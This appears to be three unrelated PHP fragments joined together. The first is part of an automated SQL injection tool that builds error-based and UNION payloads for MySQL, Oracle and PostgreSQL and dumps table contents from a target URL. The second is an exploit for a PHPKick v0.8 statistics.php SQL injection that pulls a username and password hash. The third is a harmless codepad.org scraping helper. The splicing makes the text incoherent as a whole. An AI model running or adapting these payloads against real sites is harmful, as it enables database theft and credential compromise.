function frame6() { html_header(); global $string3; global $action, $detectar_t; global $a, $payload_error, $b, $payload_union, $c, $payload_oracle, $d, $payload_postgre; if (isset($_POST['datos'])) { $url = $_POST["url"]; $vuln_index = $_POST["lol"]; $sobras = $_POST['sobras']; $nombre = $_POST['nombre']; $database = $_POST['database']; $tabla = $_POST['tn']; if (is_array($_POST['nombre']) == true) { foreach ($_POST['nombre'] as $nombres) { echo "<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"display: inline-block;vertical-align: top;\"><tr>"; echo "<td>" . asciiEncode($nombres) . "</td>"; if ($_POST['datos'] == 'data e-b') { $mode = "mysql_error"; $query = $a[$vuln_index - 1]; $querys = str_replace("{$payload_error}", "(SELECT%207656%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20)),1,50)%20FROM%20" . asciiEncode($database) . "." . $tabla . "),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)", $query); } elseif ($_POST['datos'] == 'data u-q') { $mode = "mysql_union"; $query = $b[$vuln_index - 1]; $querys = str_replace("{$payload_union}", "CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)", $query); $querys = str_replace("%23", "%20FROM%20" . asciiEncode($database) . "." . $tabla . "%23", $querys); } elseif ($_POST['datos'] == 'data o-eb') { $mode = "oracle_error"; $query = $c[$vuln_index - 1]; $querys = str_replace("{$payload_oracle}", "(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(" . asciiEncode($nombres) . ")%20FROM%20" . $database . "." . $tabla . ")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))", $query); } elseif ($_POST['datos'] == 'data pg') { $mode = "postgre_error"; $query = $d[$vuln_index - 1]; $querys = str_replace("{$payload_postgre}", "(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public." . $tabla . ")", $query); } if ($mode == "mysql_error") { $queryn = str_replace("{$payload_error}", '(SELECT%206968%20FROM(SELECT%20COUNT(%2A),CONCAT(0x3a6f79753a,(SELECT%20MID((IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20)),1,50)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1),0x3a70687a3a,floor(rand(0)%2A2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; } elseif ($mode == "mysql_union") { $queryn = str_replace("{$payload_union}", '(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST(' . asciiEncode($nombres) . '%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20' . asciiEncode($database) . '.' . $tabla . '%20LIMIT%20$i,1)', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; } elseif ($mode == "oracle_error") { $queryn = str_replace("{$payload_oracle}", '(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST(' . asciiEncode($nombres) . '%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20' . asciiEncode($nombres) . '%2CROWNUM%20AS%20LIMIT%20FROM%20' . $database . '.' . $tabla . '%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; } elseif ($mode == "postgre_error") { $queryn = str_replace("{$payload_postgre}", '(SELECT%20COALESCE(CAST(' . asciiEncode($nombres) . '%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.' . $tabla . '%20OFFSET%20$i%20LIMIT%201)', $query); $i = 0; $count = GetBetween(get_url($url . $querys . $sobras)) - 1; } echo "</tr>"; while ($i <= $count) { $query_nombre = str_replace('$i', "{$i}", $queryn); $nombre = GetBetween(get_url($url . $query_nombre . $sobras)); echo "<tr><td>" . $nombre . "</td>"; $i++; } } echo "</tr></table>"; } } }
$spos = strpos($host, "http://"); if (!is_int($spos) && $spos == 0) { $host = "http://{$host}"; } if (!$host == "http://localhost") { $spos = strpos($host, "http://www."); if (!is_int($spos) && $spos == 0) { $host = "http://www.{$host}"; } } $exploit = "statistics.php?action=overview&gameday=-32%20union%20select%201,2,3,4,0x2720756e696f6e2073656c65637420312c322c636f6e636174286e69636b2c273a272c70617373776f7274292c342c352c362c372066726f6d206b69636b5f757365722077686572652069643d2231222d2d2066,6,7,8--%20f"; echo "exploiting...\n"; $source = file_get_contents($host . $path . $exploit); $username = GetBetween($source, " :<br>", ":"); echo "username: {$username}\n"; $hash = GetBetween($source, "<br>{$username}:", "</td>"); echo "hash: {$hash}\n"; } else { echo "\n\n"; echo "|=================PHPKick v0.8 statistics.php SQL Injection==================|\n"; echo "| |\n"; echo "|Syntax: php " . $_SERVER['argv'][0] . " [host] [path] |\n"; echo "| |\n"; echo "|Example: php " . $_SERVER['argv'][0] . " http://www.domain.com /path/ |\n"; echo "| |\n"; echo "|Notes:This exploit works regardless of the PHP security settings |\n"; echo "| (magic_quotes, register_globals).This exploit is only for educational |\n"; echo "| use, use it on your own risk! Exploiting scripts without permission of|\n"; echo "| the owner of the webspace is illegal! |\n"; echo "| I'm not responsible for any resulting damage |\n"; echo "| |\n";
<?php $code = $_GET['code']; $lang = $_GET['lang']; $languages = array('c' => 'C', 'c++' => 'C++', 'd' => 'D', 'haskell' => 'Haskell', 'lua' => 'Lua', 'ocaml' => 'OCaml', 'php' => 'PHP', 'perl' => 'Perl', 'python' => 'Python', 'ruby' => 'Ruby', 'scheme' => 'Scheme', 'tcl' => 'Tcl', '2' => 'C++'); $url = 'http://codepad.org'; $data = array('code' => $code, 'lang' => $languages[strtolower($lang)], 'submit' => 'Submit', 'run' => "True", 'privite' => "True"); // use key 'http' even if you send the request to https://... $options = array('http' => array('header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data))); $context = stream_context_create($options); $result = file_get_contents($url, false, $context); //getBetween($result,'<div class="highlight">','</div>'); $data = GetBetween('<a name="output">', '</td></tr></tbody></table>', $result); echo strip_tags(GetBetween('<td width="100%" style="vertical-align: top">', '</td>', $data)); //echo(GetBetween('<div class="code">','</table>',$result)); function GetBetween($var1 = "", $var2 = "", $pool) { $temp1 = strpos($pool, $var1) + strlen($var1); $result = substr($pool, $temp1, strlen($pool)); $dd = strpos($result, $var2); if ($dd == 0) { $dd = strlen($result); } return substr($result, 0, $dd); }